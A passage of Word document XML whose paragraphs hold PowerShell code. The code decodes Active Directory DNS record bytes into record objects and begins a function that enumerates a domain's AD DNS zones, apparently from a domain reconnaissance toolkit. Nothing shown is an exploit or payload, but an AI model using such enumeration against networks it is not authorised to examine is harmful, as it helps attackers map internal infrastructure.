      </w:r>
    </w:p>
    <w:p w14:paraId="168D0FE5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [Byte[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA7732C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Raw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFA348D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBEEFB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3AFE5DD9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]$Length = $Raw[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B633409" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]$Segments = $Raw[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D00DD1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]$Index =  2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AEEEE1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]$Name  = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290F136B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4268B601" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        while ($Segments-- -gt 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461B1ECD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19798188" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [Int]$SegmentLength = $Raw[$Index++]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656AF6D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            while ($SegmentLength-- -gt 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538BF43D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Name += [Char]$Raw[$Index++]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B259E1B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2F3266" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Name += "."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AD3C90" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF91B0F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758FD182" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296557DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2FE8D25D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $RDataLen = [BitConverter]::ToUInt16($DNSRecord, 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DB1726" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $RDataType = [BitConverter]::ToUInt16($DNSRecord, 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D13CCB9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $UpdatedAtSerial = [BitConverter]::ToUInt32($DNSRecord, 8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA1865D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1EAC5742" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $TTLRaw = $DNSRecord[12..15]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549C3EAA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # reverse for big endian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091CE8BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = [array]::Reverse($TTLRaw)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35193A22" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $TTL = [BitConverter]::ToUInt32($TTLRaw, 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D7E8EB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2D0F4C8C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Age = [BitConverter]::ToUInt32($DNSRecord, 20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF87425" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($Age -ne 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8C8EC0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TimeStamp = ((Get-Date -Year 1601 -Month 1 -Day 1 -Hour 0 -Minute 0 -Second 0).AddHours($age)).ToString()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174D3764" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0852B06D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674708CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TimeStamp = "[static]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B29C46B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6100D4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3069BB8E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $DNSRecordObject = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634CF7D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1ACD21B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($RDataType -eq 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A923F51" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $IP = "{0}.{1}.{2}.{3}" -f $DNSRecord[24], $DNSRecord[25], $DNSRecord[26], $DNSRecord[27]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6793F338" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Data = $IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E6A1A8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'A'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D47C99" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBD003B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="46BE9AA5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    elseif($RDataType -eq 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193F8329" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $NSName = Get-Name $DNSRecord[24..$DNSRecord.length]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34977FDB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Data = $NSName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3310C4BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'NS'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25582169" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41068D11" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="335E8970" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    elseif($RDataType -eq 5) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCB535F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Alias = Get-Name $DNSRecord[24..$DNSRecord.length]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4A3A81" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Data = $Alias</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB33C48" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'CNAME'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701C72B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E68D6A8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="66FFA34D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    elseif($RDataType -eq 6) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7828AA9E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # TODO: how to implement properly? nested object?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2673F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3AF132" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'SOA'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7943BC50" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369C4F43" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="25997D1B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    elseif($RDataType -eq 12) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C613E64" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Ptr = Get-Name $DNSRecord[24..$DNSRecord.length]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A3440B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Data = $Ptr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577618EF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'PTR'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A778D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD3BF25" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0558F5FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    elseif($RDataType -eq 13) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E1B504" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # TODO: how to implement properly? nested object?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEA2695" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD6EA97" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'HINFO'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F248C4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DE83F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5179387A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    elseif($RDataType -eq 15) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32787E82" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # TODO: how to implement properly? nested object?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539A0111" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5627B9B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'MX'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0CD229" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE75492" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="68A45188" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    elseif($RDataType -eq 16) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D8CF36" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5292074F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [string]$TXT  = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472F407C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [int]$SegmentLength = $DNSRecord[24]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC9BD45" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Index = 25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286EF34F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        while ($SegmentLength-- -gt 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4378DF43" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $TXT += [char]$DNSRecord[$index++]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F19E4B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F67C5A6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7B165F99" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Data = $TXT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245E58CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'TXT'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5281CA26" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5835028C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="04AFA089" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    elseif($RDataType -eq 28) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AE5BEB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # TODO: how to implement properly? nested object?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C093066" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27926D5B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'AAAA'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377A0DA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606AB873" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="79330C7C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    elseif($RDataType -eq 33) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3672E2CA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # TODO: how to implement properly? nested object?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70732F07" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE022F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'SRV'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAA4EA5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229805E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3D265ED5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0410DFE8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166A888C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'UNKNOWN'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10051E5B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6A4514" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1AE8D6B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $DNSRecordObject | Add-Member Noteproperty 'UpdatedAtSerial' $UpdatedAtSerial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718160F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $DNSRecordObject | Add-Member Noteproperty 'TTL' $TTL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B722965" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $DNSRecordObject | Add-Member Noteproperty 'Age' $Age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AAC1C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $DNSRecordObject | Add-Member Noteproperty 'TimeStamp' $TimeStamp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D826E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $DNSRecordObject | Add-Member Noteproperty 'Data' $Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6959A703" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $DNSRecordObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F690D5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C325225" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="61863978" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="75579D50" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Get-DNSZone {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3AF568" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E56DA0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AB5A9C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="75BFD116" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">       Enumerates the Active Directory DNS zones for a given domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC51E98" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="573392BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
